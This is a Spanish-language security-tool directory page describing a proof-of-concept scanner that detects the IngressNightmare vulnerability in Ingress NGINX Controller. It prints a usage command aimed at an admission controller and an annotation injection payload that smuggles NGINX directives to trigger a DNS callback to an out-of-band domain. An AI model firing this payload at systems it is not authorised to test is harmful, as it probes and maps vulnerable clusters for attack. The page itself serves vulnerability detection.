Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ingressnightmare-detection-poc — Herramienta de prueba de concepto para detectar IngressNightmare (CVE-2025-1974) mediante medios activos (no intrusivos). | Kitploit
Herramientas/GitHubGitHub/m-q-t/ingressnightmare-detection-poc
Escáneres de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónSeguridad en la NubeMala Configuración
GitHubm-q-t/ingressnightmare-detection-poc

ingressnightmare-detection-poc

Herramienta de prueba de concepto para detectar IngressNightmare (CVE-2025-1974) mediante medios activos (no intrusivos).

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Detección de IngressNightmare

Descripción general

Esta herramienta proporciona una capacidad de detección no intrusiva para la cadena de vulnerabilidades IngressNightmare (CVE-2025-1974) que afecta a Ingress NGINX Controller. Específicamente, aprovecha el vector de inyección de la anotación auth-url (CVE-2025-24514) para verificar la presencia de esta vulnerabilidad crítica sin ejecutar código arbitrario.

Antecedentes técnicos

La cadena de vulnerabilidades IngressNightmare permite a los atacantes inyectar directivas arbitrarias de configuración de NGINX a través de varios campos de anotación de Ingress. Cuando estos recursos Ingress maliciosos son procesados por el controlador de admisión, las directivas inyectadas se evalúan durante la fase de validación de la configuración de NGINX (nginx -t).

Este PoC explota específicamente la vulnerabilidad de la anotación auth-url inyectando la directiva error_log con un servidor syslog que apunta a un dominio controlado por el atacante. Durante la validación de la configuración, NGINX:

  1. Analizará la configuración inyectada
  2. Resolverá el dominio especificado mediante DNS

Esta actividad de resolución DNS proporciona una señal fiable de que el objetivo es vulnerable sin requerir ejecución de código ni interrupción del servicio.

Uso

  1. Establezca un listener de devolución DNS utilizando Burp Collaborator, interactsh o cualquier servicio de monitorización DNS.

  2. Ejecute la herramienta de detección:

    root@kitploit:~
    $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
    
  3. Si es vulnerable, observará intentos de resolución DNS hacia su dominio de devolución DNS:

poc

Metodología de detección

La herramienta elabora un objeto AdmissionReview especialmente formado que contiene un recurso Ingress con la siguiente carga de inyección:

root@kitploit:~
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"

Esta carga:

  • Utiliza el carácter de comentario (#) para terminar la URL
  • Inyecta una nueva línea seguida de una directiva resolver
  • Añade la directiva error_log con syslog apuntando al dominio de devolución DNS
  • Comenta el resto para mantener la validez sintáctica

Cuando es procesada por un controlador de admisión vulnerable, esto resulta en una consulta DNS saliente que confirma la presencia de la vulnerabilidad.

Limitaciones

Esta herramienta solo detecta la presencia de la vulnerabilidad y no intenta explotarla para ejecución de código arbitrario.

Créditos

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

Descargar herramienta